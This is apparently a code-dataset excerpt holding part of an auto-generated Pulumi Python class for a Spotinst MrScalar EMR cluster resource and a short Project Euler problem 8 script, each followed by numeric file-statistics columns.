additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingDownPolicyArgs']]]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreScalingUpPolicyArgs']]]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
output_cluster_id: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input[pulumi.InputType['MrScalarProvisioningTimeoutArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingDownPolicyArgs']]]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskScalingUpPolicyArgs']]]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None) -> 'MrScalar':
"""
Get an existing MrScalar resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarApplicationArgs']]]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarBootstrapActionsFileArgs']]]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarConfigurationsFileArgs']]]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarCoreEbsBlockDeviceArgs']]]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarInstanceWeightArgs']]]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarMasterEbsBlockDeviceArgs']]]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarScheduledTaskArgs']]]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
:param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
:param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarStepsFileArgs']]]] steps_files: Steps from S3.
:param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTagArgs']]]] tags: A list of tags to assign to the resource. You may define multiple tags.
:param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTaskEbsBlockDeviceArgs']]]] task_ebs_block_devices: This determines the ebs configuration for your task group instances. Only a single block is allowed.
:param pulumi.Input[bool] task_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] task_instance_types: The MrScaler instance types for the task nodes.
:param pulumi.Input[str] task_lifecycle: The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] task_max_size: maximal amount of instances in task group.
:param pulumi.Input[int] task_min_size: The minimal amount of instances in task group.
:param pulumi.Input[str] task_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MrScalarTerminationPolicyArgs']]]] termination_policies: Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
:param pulumi.Input[bool] termination_protected: Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MrScalarState.__new__(_MrScalarState)
__props__.__dict__["additional_info"] = additional_info
__props__.__dict__["additional_primary_security_groups"] = additional_primary_security_groups
__props__.__dict__["additional_replica_security_groups"] = additional_replica_security_groups
__props__.__dict__["applications"] = applications
__props__.__dict__["availability_zones"] = availability_zones
__props__.__dict__["bootstrap_actions_files"] = bootstrap_actions_files
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["configurations_files"] = configurations_files
__props__.__dict__["core_desired_capacity"] = core_desired_capacity
__props__.__dict__["core_ebs_block_devices"] = core_ebs_block_devices
__props__.__dict__["core_ebs_optimized"] = core_ebs_optimized
__props__.__dict__["core_instance_types"] = core_instance_types
__props__.__dict__["core_lifecycle"] = core_lifecycle
__props__.__dict__["core_max_size"] = core_max_size
__props__.__dict__["core_min_size"] = core_min_size
__props__.__dict__["core_scaling_down_policies"] = core_scaling_down_policies
__props__.__dict__["core_scaling_up_policies"] = core_scaling_up_policies
__props__.__dict__["core_unit"] = core_unit
__props__.__dict__["custom_ami_id"] = custom_ami_id
__props__.__dict__["description"] = description
__props__.__dict__["ebs_root_volume_size"] = ebs_root_volume_size
__props__.__dict__["ec2_key_name"] = ec2_key_name
__props__.__dict__["expose_cluster_id"] = expose_cluster_id
__props__.__dict__["instance_weights"] = instance_weights
__props__.__dict__["job_flow_role"] = job_flow_role
__props__.__dict__["keep_job_flow_alive"] = keep_job_flow_alive
__props__.__dict__["log_uri"] = log_uri
__props__.__dict__["managed_primary_security_group"] = managed_primary_security_group
__props__.__dict__["managed_replica_security_group"] = managed_replica_security_group
__props__.__dict__["master_ebs_block_devices"] = master_ebs_block_devices
__props__.__dict__["master_ebs_optimized"] = master_ebs_optimized
__props__.__dict__["master_instance_types"] = master_instance_types
__props__.__dict__["master_lifecycle"] = master_lifecycle
__props__.__dict__["master_target"] = master_target
__props__.__dict__["name"] = name
__props__.__dict__["output_cluster_id"] = output_cluster_id
__props__.__dict__["provisioning_timeout"] = provisioning_timeout
__props__.__dict__["region"] = region
__props__.__dict__["release_label"] = release_label
__props__.__dict__["repo_upgrade_on_boot"] = repo_upgrade_on_boot
__props__.__dict__["retries"] = retries
__props__.__dict__["scheduled_tasks"] = scheduled_tasks
__props__.__dict__["security_config"] = security_config
__props__.__dict__["service_access_security_group"] = service_access_security_group
__props__.__dict__["service_role"] = service_role
__props__.__dict__["steps_files"] = steps_files
__props__.__dict__["strategy"] = strategy
__props__.__dict__["tags"] = tags
__props__.__dict__["task_desired_capacity"] = task_desired_capacity
__props__.__dict__["task_ebs_block_devices"] = task_ebs_block_devices
__props__.__dict__["task_ebs_optimized"] = task_ebs_optimized
__props__.__dict__["task_instance_types"] = task_instance_types
__props__.__dict__["task_lifecycle"] = task_lifecycle
__props__.__dict__["task_max_size"] = task_max_size
__props__.__dict__["task_min_size"] = task_min_size
__props__.__dict__["task_scaling_down_policies"] = task_scaling_down_policies
__props__.__dict__["task_scaling_up_policies"] = task_scaling_up_policies
__props__.__dict__["task_unit"] = task_unit
__props__.__dict__["termination_policies"] = termination_policies
__props__.__dict__["termination_protected"] = termination_protected
__props__.__dict__["visible_to_all_users"] = visible_to_all_users
return MrScalar(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="additionalInfo")
def additional_info(self) -> pulumi.Output[Optional[str]]:
"""
This is meta information about third-party applications that third-party vendors use for testing purposes.
"""
return pulumi.get(self, "additional_info")
@property
@pulumi.getter(name="additionalPrimarySecurityGroups")
def additional_primary_security_groups(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@property
@pulumi.getter
def applications(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarApplication']]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarBootstrapActionsFile']]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarConfigurationsFile']]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> pulumi.Output[Optional[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreEbsBlockDevice']]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> pulumi.Output[Optional[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> pulumi.Output[Optional[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@property
@pulumi.getter(name="coreScalingDownPolicies")
def core_scaling_down_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreScalingDownPolicy']]]:
return pulumi.get(self, "core_scaling_down_policies")
@property
@pulumi.getter(name="coreScalingUpPolicies")
def core_scaling_up_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarCoreScalingUpPolicy']]]:
return pulumi.get(self, "core_scaling_up_policies")
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> pulumi.Output[Optional[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="ebsRootVolumeSize")
def ebs_root_volume_size(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "ebs_root_volume_size")
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> pulumi.Output[Optional[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> pulumi.Output[Optional[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarInstanceWeight']]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> pulumi.Output[Optional[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> pulumi.Output[Optional[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> pulumi.Output[Optional[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> pulumi.Output[Optional[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarMasterEbsBlockDevice']]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> pulumi.Output[Optional[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The application name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="outputClusterId")
def output_cluster_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "output_cluster_id")
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> pulumi.Output[Optional['outputs.MrScalarProvisioningTimeout']]:
return pulumi.get(self, "provisioning_timeout")
@property
@pulumi.getter
def region(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "release_label")
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> pulumi.Output[Optional[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@property
@pulumi.getter
def retries(self) -> pulumi.Output[Optional[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarScheduledTask']]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> pulumi.Output[Optional[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> pulumi.Output[Optional[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> pulumi.Output[Optional[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarStepsFile']]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@property
@pulumi.getter
def strategy(self) -> pulumi.Output[str]:
"""
The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
"""
return pulumi.get(self, "strategy")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTag']]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> pulumi.Output[Optional[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskEbsBlockDevice']]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> pulumi.Output[Optional[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> pulumi.Output[Optional[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> pulumi.Output[Optional[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> pulumi.Output[Optional[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskScalingDownPolicy']]]:
return pulumi.get(self, "task_scaling_down_policies")
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTaskScalingUpPolicy']]]:
return pulumi.get(self, "task_scaling_up_policies")
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> pulumi.Output[Optional[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> pulumi.Output[Optional[Sequence['outputs.MrScalarTerminationPolicy']]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "visible_to_all_users")
| 52.88346
| 338
| 0.679738
| 20,281
| 174,251
| 5.583699
| 0.024703
| 0.098399
| 0.090769
| 0.056736
| 0.98218
| 0.978877
| 0.973817
| 0.969358
| 0.96602
| 0.95145
| 0
| 0.003353
| 0.217807
| 174,251
| 3,294
| 339
| 52.899514
| 0.827496
| 0.321548
| 0
| 0.934283
| 1
| 0
| 0.159154
| 0.083826
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16977
| false
| 0.000548
| 0.003834
| 0.014239
| 0.275466
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6398ccc3c667be7698d1809b95c494572f689685
| 1,268
|
py
|
Python
|
08.py
|
brianfl/project-euler
|
9f83a3c2da04fd0801a4a575081add665edccd5f
|
[
"MIT"
] | null | null | null |
08.py
|
brianfl/project-euler
|
9f83a3c2da04fd0801a4a575081add665edccd5f
|
[
"MIT"
] | null | null | null |
08.py
|
brianfl/project-euler
|
9f83a3c2da04fd0801a4a575081add665edccd5f
|
[
"MIT"
] | null | null | null |
long_number = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
list_mults = []
for i in range(0, 988):
section = long_number[0+i:13+i]
cumulative_mult = 1
for j in section:
cumulative_mult = cumulative_mult * int(j)
list_mults.append(cumulative_mult)
print(max(list_mults)) # 23514624000
| 105.666667
| 1,016
| 0.932177
| 41
| 1,268
| 28.609756
| 0.536585
| 0.047741
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.840759
| 0.044164
| 1,268
| 12
| 1,017
| 105.666667
| 0.127063
| 0.008675
| 0
| 0
| 0
